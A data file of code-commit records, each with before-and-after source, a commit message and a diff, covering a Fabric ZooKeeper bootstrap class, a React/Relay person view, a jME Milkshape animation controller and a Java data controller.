"mvn:org.fusesource.fabric/fabric-zookeeper/" + FabricConstants.FABRIC_VERSION); for (; ; ) { Configuration[] configs = configAdmin.get().listConfigurations("(|(service.factoryPid=org.fusesource.fabric.zookeeper.server)(service.pid=org.fusesource.fabric.zookeeper))"); if (configs != null && configs.length > 0) { for (Configuration config : configs) { config.delete(); } Thread.sleep(100); } else { break; } } File zkDir = new File("data/zookeeper"); if (zkDir.isDirectory()) { File newZkDir = new File("data/zookeeper." + System.currentTimeMillis()); if (!zkDir.renameTo(newZkDir)) { newZkDir = zkDir; } delete(newZkDir); } bundleFabricZooKeeper.start(); } catch (Exception e) { throw new FabricException("Unable to delete zookeeper configuration", e); } } private void updateDataStoreConfig(Map<String, String> dataStoreConfiguration) throws IOException { boolean updated = false; Configuration config = configAdmin.get().getConfiguration(DataStore.DATASTORE_TYPE_PID); Dictionary<String, Object> properties = config.getProperties(); for (Map.Entry<String, String> entry : dataStoreConfiguration.entrySet()) { String key = entry.getKey(); String value = entry.getValue(); if (!value.equals(properties.put(key, value))) { updated = true; } } if (updated) { //We unbind, so that we know exactly when we get the re-configured instance. //dataStoreRegistrationHandler.unbind(); config.setBundleLocation(null); config.update(properties); } } /** * Creates ZooKeeper server configuration */ private void createZooKeeeperServerConfig(String serverHost, int serverPort, CreateEnsembleOptions options) throws IOException { Configuration config = configAdmin.get().createFactoryConfiguration("org.fusesource.fabric.zookeeper.server"); Hashtable properties = new Hashtable<String, Object>(); if (options.isAutoImportEnabled()) { loadPropertiesFrom(properties, options.getImportPath() + "/fabric/configs/versions/1.0/profiles/default/org.fusesource.fabric.zookeeper.server.properties"); } properties.put("tickTime", "2000"); properties.put("initLimit", "10"); properties.put("syncLimit", "5"); properties.put("dataDir", "data/zookeeper/0000"); properties.put("clientPort", Integer.toString(serverPort)); properties.put("clientPortAddress", serverHost); properties.put("fabric.zookeeper.pid", "org.fusesource.fabric.zookeeper.server-0000"); config.setBundleLocation(null); config.update(properties); } /** * Creates ZooKeeper client configuration. * @param connectionUrl * @param options * @throws IOException */ private void createZooKeeeperConfig(String connectionUrl, CreateEnsembleOptions options) throws IOException { Configuration config = configAdmin.get().getConfiguration("org.fusesource.fabric.zookeeper"); Hashtable properties = new Hashtable<String, Object>(); if (options.isAutoImportEnabled()) { loadPropertiesFrom(properties, options.getImportPath() + "/fabric/configs/versions/1.0/profiles/default/org.fusesource.fabric.zookeeper.properties"); } properties.put("zookeeper.url", connectionUrl); properties.put("zookeeper.timeout", System.getProperties().containsKey("zookeeper.timeout") ? System.getProperties().getProperty("zookeeper.timeout") : "30000"); properties.put("fabric.zookeeper.pid", "org.fusesource.fabric.zookeeper"); properties.put("zookeeper.password", options.getZookeeperPassword()); config.setBundleLocation(null); config.update(properties); } public void startBundles(CreateEnsembleOptions options) throws BundleException { // Install or stop the fabric-configadmin bridge Bundle bundleFabricAgent = installOrStopBundle(bundleContext, "org.fusesource.fabric.fabric-agent", "mvn:org.fusesource.fabric/fabric-agent/" + FabricConstants.FABRIC_VERSION); Bundle bundleFabricConfigAdmin = instalBundle(bundleContext, "org.fusesource.fabric.fabric-configadmin", "mvn:org.fusesource.fabric/fabric-configadmin/" + FabricConstants.FABRIC_VERSION); Bundle bundleFabricCommands = instalBundle(bundleContext, "org.fusesource.fabric.fabric-commands ", "mvn:org.fusesource.fabric/fabric-commands/" + FabricConstants.FABRIC_VERSION); bundleFabricCommands.start(); bundleFabricConfigAdmin.start(); //Check if the agent is configured to auto start. if (options.isAgentEnabled()) { bundleFabricAgent.start(); } } private void loadPropertiesFrom(Hashtable hashtable, String from) { InputStream is = null; Properties properties = new Properties(); try { is = new FileInputStream(from); properties.load(is); for (String key : properties.stringPropertyNames()) { hashtable.put(key, properties.get(key)); } } catch (Exception e) { // Ignore } finally { if (is != null) { try { is.close(); } catch (Exception e) { // Ignore } } } } private static void delete(File dir) { if (dir.isDirectory()) { for (File child : dir.listFiles()) { delete(child); } } if (dir.exists()) { dir.delete(); } } private static String getConnectionAddress() throws UnknownHostException { String resolver = System.getProperty(ZkDefs.LOCAL_RESOLVER_PROPERTY, System.getProperty(ZkDefs.GLOBAL_RESOLVER_PROPERTY, ZkDefs.LOCAL_HOSTNAME)); if (resolver.equals(ZkDefs.LOCAL_HOSTNAME)) { return HostUtils.getLocalHostName(); } else if (resolver.equals(ZkDefs.LOCAL_IP)) { return HostUtils.getLocalIp(); } else if (resolver.equals(ZkDefs.MANUAL_IP) && System.getProperty(ZkDefs.MANUAL_IP) != null) { return System.getProperty(ZkDefs.MANUAL_IP); } else return HostUtils.getLocalHostName(); } private static String toString(Properties source) throws IOException { StringWriter writer = new StringWriter(); source.store(writer, null); return writer.toString(); } public static Properties getProperties(CuratorFramework client, String file, Properties defaultValue) throws Exception { try { String v = getStringData(client, file); if (v != null) { return DataStoreHelpers.toProperties(v); } else { return defaultValue; } } catch (KeeperException.NoNodeException e) { return defaultValue; } } void bindConfigAdmin(ConfigurationAdmin service) { this.configAdmin.set(service); } void unbindConfigAdmin(ConfigurationAdmin service) { this.configAdmin.set(null); } void bindRegistrationHandler(DataStoreRegistrationHandler service) { this.registrationHandler.set(service); } void unbindRegistrationHandler(DataStoreRegistrationHandler service) { this.registrationHandler.set(null); } }
@ThreadSafe ZooKeeperClusterBootstrapImpl
fabric/fabric-core/src/main/java/org/fusesource/fabric/internal/ZooKeeperClusterBootstrapImpl.java
@ThreadSafe ZooKeeperClusterBootstrapImpl
<ide><path>abric/fabric-core/src/main/java/org/fusesource/fabric/internal/ZooKeeperClusterBootstrapImpl.java <ide> import org.fusesource.fabric.api.FabricException; <ide> import org.fusesource.fabric.api.FabricService; <ide> import org.fusesource.fabric.api.ZooKeeperClusterBootstrap; <add>import org.fusesource.fabric.api.jcip.GuardedBy; <add>import org.fusesource.fabric.api.jcip.Immutable; <add>import org.fusesource.fabric.api.jcip.ThreadSafe; <ide> import org.fusesource.fabric.api.scr.AbstractComponent; <ide> import org.fusesource.fabric.api.scr.ValidatingReference; <ide> import org.fusesource.fabric.utils.HostUtils; <ide> import java.io.InputStream; <ide> import java.io.StringWriter; <ide> import java.net.UnknownHostException; <add>import java.util.Collections; <ide> import java.util.Dictionary; <ide> import java.util.Hashtable; <ide> import java.util.Map; <ide> import static org.fusesource.fabric.utils.Ports.mapPortToRange; <ide> import static org.fusesource.fabric.zookeeper.utils.ZooKeeperUtils.getStringData; <ide> <del>@Component(name = "org.fusesource.fabric.zookeeper.cluster.bootstrap", description = "Fabric ZooKeeper Cluster Bootstrap", immediate = true) <add>@ThreadSafe <add>@Component(name = "org.fusesource.fabric.zookeeper.cluster.bootstrap", description = "Fabric ZooKeeper Cluster Bootstrap", immediate = true) // Done <ide> @Service(ZooKeeperClusterBootstrap.class) <del>public class ZooKeeperClusterBootstrapImpl extends AbstractComponent implements ZooKeeperClusterBootstrap { <add>public final class ZooKeeperClusterBootstrapImpl extends AbstractComponent implements ZooKeeperClusterBootstrap { <ide> <ide> private static final Long FABRIC_SERVICE_TIMEOUT = 60000L; <ide> private static final Logger LOGGER = LoggerFactory.getLogger(ZooKeeperClusterBootstrapImpl.class); <ide> @Reference(referenceInterface = DataStoreRegistrationHandler.class) <ide> private final ValidatingReference<DataStoreRegistrationHandler> registrationHandler = new ValidatingReference<DataStoreRegistrationHandler>(); <ide> <del> private Map<String, String> configuration; <del> private BundleContext bundleContext; <add> @Immutable <add> static class ComponentState { <add> private final Map<String, String> configuration; <add> private final BundleContext bundleContext; <add> ComponentState (BundleContext bundleContext, Map<String,String> configuration) { <add> this.bundleContext = bundleContext; <add> this.configuration = Collections.unmodifiableMap(configuration); <add> } <add> Map<String, String> getConfiguration() { <add> return configuration; <add> } <add> BundleContext getBundleContext() { <add> return bundleContext; <add> } <add> } <add> @GuardedBy("this") private ComponentState componentState; <ide> <ide> @Activate <ide> synchronized void activate(BundleContext bundleContext, Map<String,String> configuration) { <del> this.bundleContext = bundleContext; <del> activateComponent(); <del> try { <del> this.configuration = configuration; <del> new Thread(new Runnable() { <del> @Override <del> public void run() { <del> create(); <del> } <del> }).start(); <del> } catch (RuntimeException rte) { <del> deactivateComponent(); <del> throw rte; <del> } <add> componentState = new ComponentState (bundleContext, configuration); <add> new Thread(new Runnable() { <add> @Override <add> public void run() { <add> createOnActivate(); <add> activateComponent(); <add> } <add> }).start(); <ide> } <ide> <ide> @Deactivate <ide> deactivateComponent(); <ide> } <ide> <del> void create() { <add> synchronized ComponentState getComponentState() { <add> return componentState; <add> } <add> <add> private void createOnActivate() { <ide> org.apache.felix.utils.properties.Properties userProps = null; <del> <ide> try { <ide> userProps = new org.apache.felix.utils.properties.Properties(new File(System.getProperty("karaf.home") + "/etc/users.properties")); <ide> } catch (IOException e) { <ide> } <ide> CreateEnsembleOptions createOpts = CreateEnsembleOptions.builder().fromSystemProperties().users(userProps).build(); <ide> if (createOpts.isEnsembleStart()) { <del> create(createOpts); <del> } <del> } <del> <add> createInternal(createOpts); <add> } <add> } <add> <add> @Override <ide> public void create(CreateEnsembleOptions options) { <add> assertValid(); <add> createInternal(options); <add> } <add> <add> private synchronized void createInternal(CreateEnsembleOptions options) { <ide> try { <ide> int minimumPort = options.getMinimumPort(); <ide> int maximumPort = options.getMaximumPort(); <ide> // Create configuration <ide> updateDataStoreConfig(options.getDataStoreProperties()); <ide> createZooKeeeperServerConfig(zooKeeperServerHost, mappedPort, options); <add> Map<String, String> configuration = getComponentState().getConfiguration(); <ide> registrationHandler.get().addRegistrationCallback(new DataStoreBootstrapTemplate(connectionUrl, configuration, options)); <ide> <ide> // Create the client configuration <ide> } catch (Exception e) { <ide> throw new FabricException("Unable to create zookeeper server configuration", e); <ide> } <del> } <del> <add> } <add> <add> @Override <ide> public void clean() { <del> try { <add> assertValid(); <add> try { <add> BundleContext bundleContext = componentState.getBundleContext(); <ide> Bundle bundleFabricZooKeeper = installOrStopBundle(bundleContext, "org.fusesource.fabric.fabric-zookeeper", <ide> "mvn:org.fusesource.fabric/fabric-zookeeper/" + FabricConstants.FABRIC_VERSION); <ide> <ide> } <ide> <ide> <del> public void startBundles(CreateEnsembleOptions options) throws BundleException { <add> private void startBundles(CreateEnsembleOptions options) throws BundleException { <ide> // Install or stop the fabric-configadmin bridge <add> BundleContext bundleContext = getComponentState().getBundleContext(); <ide> Bundle bundleFabricAgent = installOrStopBundle(bundleContext, "org.fusesource.fabric.fabric-agent", <ide> "mvn:org.fusesource.fabric/fabric-agent/" + FabricConstants.FABRIC_VERSION); <ide> Bundle bundleFabricConfigAdmin = instalBundle(bundleContext, "org.fusesource.fabric.fabric-configadmin", <ide> return writer.toString(); <ide> } <ide> <del> public static Properties getProperties(CuratorFramework client, String file, Properties defaultValue) throws Exception { <add> private static Properties getProperties(CuratorFramework client, String file, Properties defaultValue) throws Exception { <ide> try { <ide> String v = getStringData(client, file); <ide> if (v != null) {
JavaScript
apache-2.0
89b418a0895472d482d930ec1e99b1ab07a05374
0
grahammendick/navigation,grahammendick/navigation,grahammendick/navigation,grahammendick/navigation,grahammendick/navigation,grahammendick/navigation,grahammendick/navigation
import React from 'react'; import { createFragmentContainer, graphql } from 'react-relay'; import { NavigationBackLink } from 'navigation-react'; var Person = ({ person }) => ( <div> <NavigationBackLink distance={1}> Person Search </NavigationBackLink> <div> <h2>{person.name}</h2> <div className="label">Date of Birth</div> <div>{person.name}</div> <div className="label">Email</div> <div>{person.email}</div> <div className="label">Phone</div> <div>{person.phone}</div> </div> </div> ); var PersonQuery = graphql` query PersonQuery($id: Int!) { person(id: $id) { ...Person_person } } `; var PersonContainer = createFragmentContainer(Person, { person: graphql` fragment Person_person on Person { name, dateOfBirth, email, phone } `, }); export { PersonQuery, PersonContainer };
NavigationReact/sample/relay-modern/src/Person.js
import React from 'react'; import { createFragmentContainer, graphql } from 'react-relay'; import { NavigationBackLink } from 'navigation-react'; var Person = ({ person }) => ( <div> <NavigationBackLink distance={1}> Person Search </NavigationBackLink> <div> <h2>{person.name}</h2> <div className="label">Date of Birth</div> <div>{person.name}</div> <div className="label">Email</div> <div>{person.email}</div> <div className="label">Phone</div> <div>{person.phone}</div> </div> </div> ); var PersonQuery = graphql` query PersonQuery($id: Int!) { person(id: $id) { ...Person_person } } `; var PersonContainer = createFragmentContainer(Person, { person: graphql` fragment Person_person on Person { name, dateOfBirth, email, phone } `, }); export { PersonQuery, PersonContainer };
Tweaked format
NavigationReact/sample/relay-modern/src/Person.js
Tweaked format
<ide><path>avigationReact/sample/relay-modern/src/Person.js <ide> } <ide> } <ide> `; <add> <ide> var PersonContainer = createFragmentContainer(Person, { <ide> person: graphql` <ide> fragment Person_person on Person {
Java
bsd-2-clause
305713f0f4cb24b6b9dd63c00568b00220a01c4b
0
chototsu/MikuMikuStudio,chototsu/MikuMikuStudio,chototsu/MikuMikuStudio,chototsu/MikuMikuStudio
package com.jme.scene.model.ms3d; import com.jme.math.Vector3f; import com.jme.math.Quaternion; import com.jme.math.TransformMatrix; import com.jme.scene.Controller; import com.jme.bounding.BoundingBox; /** * Class to support animations returned from a MilkLoader. * It is important to note that <code>setMinTime</code> and * <code>setMaxTime</code> actually set the begining and ending * keyframe not it's given time. * * @author Jack Lindamood **/ public class MilkAnimation extends Controller{ private Quaternion unSyncbeginAngle=new Quaternion(); private Vector3f unSyncbeginPos=new Vector3f(); private MilkFile movementFile; private TransformMatrix[] jointMovements; private TransformMatrix tempUnSyncd=new TransformMatrix(); private int currentFrame; private float changeAmnt; float timeBetweenFrames; private float skipRate; private float totalSkip; MilkAnimation(MilkFile movementFile, long startTime, long endTime, float duration) { this.movementFile=movementFile; this.timeBetweenFrames=duration; jointMovements=new TransformMatrix[movementFile.nNumJoints]; for (int i=0;i<jointMovements.length;i++) jointMovements[i]=new TransformMatrix(); this.setMaxTime(endTime); this.setMinTime(startTime); this.setSpeed(1); this.setRepeatType(Controller.RT_CYCLE); skipRate=totalSkip=0; } /** * Sets the minimum <I>frame</I> the animation should start at. * If time is less than 0 or greater than maximum frame, call is ignored * @param frame New minimum frame */ public void setMinTime(float frame){ if (frame < 0 || frame > this.getMaxTime() || this.getMinTime()==frame) return; super.setMinTime(frame); currentFrame= (int) frame; } /** * Sets the maximum <I>frame</I> the animation should start at. * If time is more than total animation or greater than minimum frame, call is ignored * @param frame New maximum frame */ public void setMaxTime(float frame){ if (frame <= this.getMinTime() || frame>movementFile.iTotalFrames || this.getMaxTime()==frame) return; super.setMaxTime(frame); currentFrame = (int) this.getMinTime(); } /** * To increase Frames per Second you can specify the amount of time * that should elapse between one update and another for this animation * @param skipRate The new skipRate. The parameter is ignored if it is * larger than the time between frames specified in the ms3d, or less than 0. */ public void setSkipRate(float skipRate){ if (skipRate<0 || skipRate > this.timeBetweenFrames) return; this.skipRate=skipRate; this.totalSkip=0; } /** * Returns skipRate * @return */ public float getSkipRate(){ return this.skipRate; } public void update(float time) { if (!this.isActive()) return; changeAmnt+=time*this.getSpeed(); if (skipRate!=0f){ totalSkip+=time; if (totalSkip >= skipRate) totalSkip=0; else return; } if (changeAmnt>=this.timeBetweenFrames){ changeAmnt=0; currentFrame++; if (currentFrame >= this.getMaxTime()){ if (this.getRepeatType()!=Controller.RT_CLAMP) currentFrame= (int) this.getMinTime(); else this.setActive(false); } } createJointTransforms(changeAmnt); combineWithInverse(); updateData(); } BoundingBox findBiggestFit(int currentGroup){ Vector3f[] extents=new Vector3f[6]; for (int i=0;i<extents.length;i++) extents[i]=new Vector3f(); for (currentFrame=(int) this.getMinTime(); currentFrame<this.getMaxTime();currentFrame++){ for (float changeAmnt=0;changeAmnt<=1;changeAmnt+=.25){ createJointTransforms(changeAmnt); combineWithInverse(); updateBox(extents,currentGroup); } } BoundingBox toReturn=new BoundingBox("Computed Largest Box"); toReturn.computeFromPoints(extents); currentFrame=(int) this.getMinTime(); return toReturn; } private void updateBox(Vector3f[] extents,int currentGroup) { MilkshapeGroup updatingGroup=movementFile.myGroups[currentGroup]; int currentBoneIndex; for (int j=0;j<updatingGroup.numTriangles;j++){ for (int s=0;s<3;s++){ // Each tri has 3 co-ords int coordIndex=movementFile.myTri[ updatingGroup.triangleIndices[j]]. vertexIndices[s]; currentBoneIndex=movementFile.boneID[coordIndex]; if (currentBoneIndex==-1) continue; unSyncbeginPos.set(movementFile.vertexes[coordIndex]); jointMovements[currentBoneIndex].multPoint(unSyncbeginPos); if (unSyncbeginPos.x < extents[0].x) extents[0].set(unSyncbeginPos); if (unSyncbeginPos.x > extents[1].x) extents[1].set(unSyncbeginPos); if (unSyncbeginPos.y < extents[2].y) extents[2].set(unSyncbeginPos); if (unSyncbeginPos.y > extents[3].y) extents[3].set(unSyncbeginPos); if (unSyncbeginPos.z < extents[4].z) extents[4].set(unSyncbeginPos); if (unSyncbeginPos.z > extents[5].z) extents[5].set(unSyncbeginPos); } } } private void combineWithInverse() { for (int i=0;i<jointMovements.length;i++) jointMovements[i].multLocal(movementFile.myJoints[i].inverseChainMatrix,unSyncbeginPos); } private void createJointTransforms(float changeAmnt) { for (int index=0;index<jointMovements.length;index++){ int theParentIndex=movementFile.myJoints[index].parentIndex; unSyncbeginAngle.set(movementFile.myJoints[index].keyframeRot[currentFrame]); unSyncbeginPos.set(movementFile.myJoints[index].keyframePos[currentFrame]); unSyncbeginAngle.slerp(movementFile.myJoints[index].keyframeRot[currentFrame+1],changeAmnt); unSyncbeginPos.interpolate(movementFile.myJoints[index].keyframePos[currentFrame+1],changeAmnt); tempUnSyncd.set(unSyncbeginAngle,unSyncbeginPos); jointMovements[index].set(movementFile.myJoints[index].localRefMatrix); jointMovements[index].multLocal(tempUnSyncd,unSyncbeginPos); if (theParentIndex!=-1){ tempUnSyncd.set(jointMovements[index]); jointMovements[index].set(jointMovements[theParentIndex]); jointMovements[index].multLocal(tempUnSyncd,unSyncbeginPos); } } } private void updateData(){ for (int currentGroup=0;currentGroup<movementFile.nNumGroups;currentGroup++){ MilkshapeGroup updatingGroup=movementFile.myGroups[currentGroup]; int currentBoneIndex; for (int j=0;j<updatingGroup.numTriangles;j++){ for (int s=0;s<3;s++){ // Each tri has 3 co-ords int coordIndex=movementFile.myTri[ updatingGroup.triangleIndices[j]]. vertexIndices[s]; currentBoneIndex=movementFile.boneID[coordIndex]; if (currentBoneIndex==-1) continue; unSyncbeginPos.set(movementFile.vertexes[coordIndex]); updatingGroup.setVertex(j*3+s, jointMovements[currentBoneIndex].multPoint(unSyncbeginPos)); unSyncbeginPos.set(movementFile.myTri[updatingGroup.triangleIndices[j]].vertexNormals[s]); updatingGroup.setNormal(j*3+s, jointMovements[currentBoneIndex].multNormal(unSyncbeginPos)); } } } } }
src/com/jme/scene/model/ms3d/MilkAnimation.java
package com.jme.scene.model.ms3d; import com.jme.math.Vector3f; import com.jme.math.Quaternion; import com.jme.math.TransformMatrix; import com.jme.scene.Controller; import com.jme.bounding.BoundingBox; /** * Class to support animations returned from a MilkLoader. * It is important to note that <code>setMinTime</code> and * <code>setMaxTime</code> actually set the begining and ending * keyframe not it's given time. * * @author Jack Lindamood **/ public class MilkAnimation extends Controller{ private Quaternion unSyncbeginAngle=new Quaternion(); private Vector3f unSyncbeginPos=new Vector3f(); private MilkFile movementFile; private TransformMatrix[] jointMovements; private TransformMatrix tempUnSyncd=new TransformMatrix(); private int currentFrame; private float changeAmnt; float timeBetweenFrames; private float skipRate; private float totalSkip; MilkAnimation(MilkFile movementFile, long startTime, long endTime, float duration) { this.movementFile=movementFile; this.timeBetweenFrames=duration; jointMovements=new TransformMatrix[movementFile.nNumJoints]; for (int i=0;i<jointMovements.length;i++) jointMovements[i]=new TransformMatrix(); this.setMaxTime(endTime); this.setMinTime(startTime); this.setSpeed(1); this.setRepeatType(Controller.RT_CYCLE); skipRate=totalSkip=0; } /** * Sets the minimum <I>frame</I> the animation should start at. * If time is less than 0 or greater than maximum frame, call is ignored * @param frame New minimum frame */ public void setMinTime(float frame){ if (frame < 0 || frame > this.getMaxTime() || this.getMinTime()==frame) return; super.setMinTime(frame); currentFrame= (int) frame; } /** * Sets the maximum <I>frame</I> the animation should start at. * If time is more than total animation or greater than minimum frame, call is ignored * @param frame New maximum frame */ public void setMaxTime(float frame){ if (frame <= this.getMinTime() || frame>movementFile.iTotalFrames || this.getMaxTime()==frame) return; super.setMaxTime(frame); currentFrame = (int) this.getMinTime(); } /** * To increase Frames per Second you can specify the amount of time * that should elapse between one update and another for this animation * @param skipRate The new skipRate. The parameter is ignored if it is * larger than the time between frames specified in the ms3d, or less than 0. */ public void setSkipRate(float skipRate){ if (skipRate<0 || skipRate > this.timeBetweenFrames) return; this.skipRate=skipRate; this.totalSkip=0; } /** * Returns skipRate * @return */ public float getSkipRate(){ return this.skipRate; } public void update(float time) { if (!this.isActive()) return; changeAmnt+=time*this.getSpeed(); if (skipRate!=0f){ totalSkip+=time; if (totalSkip >= skipRate) totalSkip=0; else return; } if (changeAmnt>=this.timeBetweenFrames){ changeAmnt=0; currentFrame++; if (currentFrame >= this.getMaxTime()){ if (this.getRepeatType()!=Controller.RT_CLAMP) currentFrame= (int) this.getMinTime(); else this.setActive(false); } } createJointTransforms(changeAmnt); combineWithInverse(); updateData(); } BoundingBox findBiggestFit(int currentGroup){ Vector3f[] extents=new Vector3f[6]; for (int i=0;i<extents.length;i++) extents[i]=new Vector3f(); for (currentFrame=(int) this.getMinTime(); currentFrame<this.getMaxTime();currentFrame++){ for (float changeAmnt=0;changeAmnt<=1;changeAmnt+=.25){ createJointTransforms(changeAmnt); combineWithInverse(); updateBox(extents,currentGroup); } } BoundingBox toReturn=new BoundingBox("Computed Largest Box"); toReturn.computeFromPoints(extents); currentFrame=(int) this.getMinTime(); return toReturn; } private void updateBox(Vector3f[] extents,int currentGroup) { MilkshapeGroup updatingGroup=movementFile.myGroups[currentGroup]; int currentBoneIndex; for (int j=0;j<updatingGroup.numTriangles;j++){ for (int s=0;s<3;s++){ // Each tri has 3 co-ords int coordIndex=movementFile.myTri[ updatingGroup.triangleIndices[j]]. vertexIndices[s]; currentBoneIndex=movementFile.boneID[coordIndex]; if (currentBoneIndex==-1) continue; unSyncbeginPos.set(movementFile.vertexes[coordIndex]); jointMovements[currentBoneIndex].multPoint(unSyncbeginPos); if (unSyncbeginPos.x < extents[0].x) extents[0].set(unSyncbeginPos); if (unSyncbeginPos.x > extents[1].x) extents[1].set(unSyncbeginPos); if (unSyncbeginPos.y < extents[2].y) extents[2].set(unSyncbeginPos); if (unSyncbeginPos.y > extents[3].y) extents[3].set(unSyncbeginPos); if (unSyncbeginPos.z < extents[4].z) extents[4].set(unSyncbeginPos); if (unSyncbeginPos.z > extents[5].z) extents[5].set(unSyncbeginPos); } } } private void combineWithInverse() { for (int i=0;i<jointMovements.length;i++) jointMovements[i].multLocal(movementFile.myJoints[i].inverseChainMatrix); } private void createJointTransforms(float changeAmnt) { for (int index=0;index<jointMovements.length;index++){ int theParentIndex=movementFile.myJoints[index].parentIndex; unSyncbeginAngle.set(movementFile.myJoints[index].keyframeRot[currentFrame]); unSyncbeginPos.set(movementFile.myJoints[index].keyframePos[currentFrame]); unSyncbeginAngle.slerp(movementFile.myJoints[index].keyframeRot[currentFrame+1],changeAmnt); unSyncbeginPos.interpolate(movementFile.myJoints[index].keyframePos[currentFrame+1],changeAmnt); tempUnSyncd.set(unSyncbeginAngle,unSyncbeginPos); jointMovements[index].set(movementFile.myJoints[index].localRefMatrix); jointMovements[index].multLocal(tempUnSyncd); if (theParentIndex!=-1){ tempUnSyncd.set(jointMovements[index]); jointMovements[index].set(jointMovements[theParentIndex]); jointMovements[index].multLocal(tempUnSyncd); } } } private void updateData(){ for (int currentGroup=0;currentGroup<movementFile.nNumGroups;currentGroup++){ MilkshapeGroup updatingGroup=movementFile.myGroups[currentGroup]; int currentBoneIndex; for (int j=0;j<updatingGroup.numTriangles;j++){ for (int s=0;s<3;s++){ // Each tri has 3 co-ords int coordIndex=movementFile.myTri[ updatingGroup.triangleIndices[j]]. vertexIndices[s]; currentBoneIndex=movementFile.boneID[coordIndex]; if (currentBoneIndex==-1) continue; unSyncbeginPos.set(movementFile.vertexes[coordIndex]); updatingGroup.setVertex(j*3+s, jointMovements[currentBoneIndex].multPoint(unSyncbeginPos)); unSyncbeginPos.set(movementFile.myTri[updatingGroup.triangleIndices[j]].vertexNormals[s]); updatingGroup.setNormal(j*3+s, jointMovements[currentBoneIndex].multNormal(unSyncbeginPos)); } } } } }
TransformMult update git-svn-id: 5afc437a751a4ff2ced778146f5faadda0b504ab@1498 75d07b2b-3a1a-0410-a2c5-0572b91ccdca
src/com/jme/scene/model/ms3d/MilkAnimation.java
TransformMult update
<ide><path>rc/com/jme/scene/model/ms3d/MilkAnimation.java <ide> <ide> private void combineWithInverse() { <ide> for (int i=0;i<jointMovements.length;i++) <del> jointMovements[i].multLocal(movementFile.myJoints[i].inverseChainMatrix); <add> jointMovements[i].multLocal(movementFile.myJoints[i].inverseChainMatrix,unSyncbeginPos); <ide> } <ide> private void createJointTransforms(float changeAmnt) { <ide> for (int index=0;index<jointMovements.length;index++){ <ide> unSyncbeginPos.interpolate(movementFile.myJoints[index].keyframePos[currentFrame+1],changeAmnt); <ide> tempUnSyncd.set(unSyncbeginAngle,unSyncbeginPos); <ide> jointMovements[index].set(movementFile.myJoints[index].localRefMatrix); <del> jointMovements[index].multLocal(tempUnSyncd); <add> jointMovements[index].multLocal(tempUnSyncd,unSyncbeginPos); <ide> if (theParentIndex!=-1){ <ide> tempUnSyncd.set(jointMovements[index]); <ide> jointMovements[index].set(jointMovements[theParentIndex]); <del> jointMovements[index].multLocal(tempUnSyncd); <add> jointMovements[index].multLocal(tempUnSyncd,unSyncbeginPos); <ide> } <ide> } <ide> }
Java
mit
25067578563c8858319183c665facc88f9ac8c5e
0
nullbox/Data-and-Information-Visualization-Project
package big.marketing.controller; import java.io.IOException; import java.util.EnumMap; import java.util.List; import java.util.Observable; import org.apache.log4j.Logger; import big.marketing.Settings; import big.marketing.data.DataType; import big.marketing.data.FlowMessage; import big.marketing.data.HealthMessage; import big.marketing.data.IPSMessage; import big.marketing.data.Node; import big.marketing.reader.NetworkReader; import big.marketing.reader.ZipReader; public class DataController extends Observable implements Runnable { // http://docs.oracle.com/javase/7/docs/api/java/util/Observable.html static Logger logger = Logger.getLogger(DataController.class); private GephiController gc; private MongoController mc; // qWindow size in milliseconds, default value 1 hour static int QUERYWINDOW_SIZE = 6000; // qWindow variables store the data returned from mongo private List<HealthMessage> qWindowHealth = null; private List<IPSMessage> qWindowIPS = null; private List<FlowMessage> qWindowFlow = null; private List<Node> network = null; private Node[] highlightedNodes = null; private Node selectedNode = null; private Thread readingThread; public DataController() { loadSettings(); this.mc = MongoController.getInstance(); this.gc = new GephiController(); } public void readData() { readingThread = new Thread(this, "DataReader"); readingThread.start(); } public void run() { // TODO These things would be better to do directly in readers // The readers should independently handle reading and storing to the // database when started from the interface. Every reader should handle // it's own errors NetworkReader nReader = new NetworkReader(this.mc); ZipReader zReader = new ZipReader(this.mc); try { network = nReader.readNetwork(); EnumMap<DataType, Boolean> presentInDatabase = new EnumMap<DataType, Boolean>(DataType.class); for (DataType t : DataType.values()) { presentInDatabase.put(t, mc.isDataInDatabase(t)); } for (int week = 1; week <= 2; week++) { for (DataType t : DataType.values()) { if (!presentInDatabase.get(t)) zReader.read(t, week); } } } catch (IOException err) { logger.error("Error while loading network data.", err); } } /** * Moves QueryWindow to certain position in time and queries data to qWindow * variables from mongo Hides mongo implementation details from views * * @param date in milliseconds marking the center point of the query * @return TODO return some info */ @SuppressWarnings("unchecked") public void moveQueryWindow(int msdate) { int start = msdate - QUERYWINDOW_SIZE / 2, end = msdate + QUERYWINDOW_SIZE / 2; long startTime = System.currentTimeMillis(); qWindowHealth = (List<HealthMessage>) (List<?>) mc.getConstrainedEntries(DataType.HEALTH, "Time", start, end); // qWindowIPS = (List<IPSMessage>) (List<?>) mc.getConstrainedEntries(DataType.IPS, "Time", start, end); // qWindowFlow = (List<FlowMessage>) (List<?>) mc.getConstrainedEntries(DataType.FLOW, "Time", start, end); logger.info("Moved qWindow to " + msdate + ", Query took " + (System.currentTimeMillis() - startTime) + " ms, Window size: " + QUERYWINDOW_SIZE + " ms, Flow: " + qWindowFlow.size() + " objects, Health: " + qWindowHealth.size() + " objects, IPS: " + qWindowIPS.size() + " objects"); // TODO moveQueryWindow should return some info about the success of the database query } private void loadSettings() { try { QUERYWINDOW_SIZE = Integer.valueOf(Settings.get("controller.querywindow.size")); } catch (NumberFormatException err) { logger.error("Loading settings failed, number conversion error", err); } } public List<Node> getNetwork() { return network; } public List<HealthMessage> getqWindowHealth() { return qWindowHealth; } public List<IPSMessage> getqWindowIPS() { return qWindowIPS; } public List<FlowMessage> getqWindowFlow() { return qWindowFlow; } public void setHighlightedNodes(Node[] highlightedNodes) { this.highlightedNodes = highlightedNodes; setChanged(); } public void setSelectedNode(Node selectedNode) { this.selectedNode = selectedNode; setChanged(); } public Node[] getHighlightedNodes() { return highlightedNodes; } public Node getSelectedNode() { return selectedNode; } public MongoController getMongoController() { return mc; } public GephiController getGephiController() { return gc; } }
src/big/marketing/controller/DataController.java
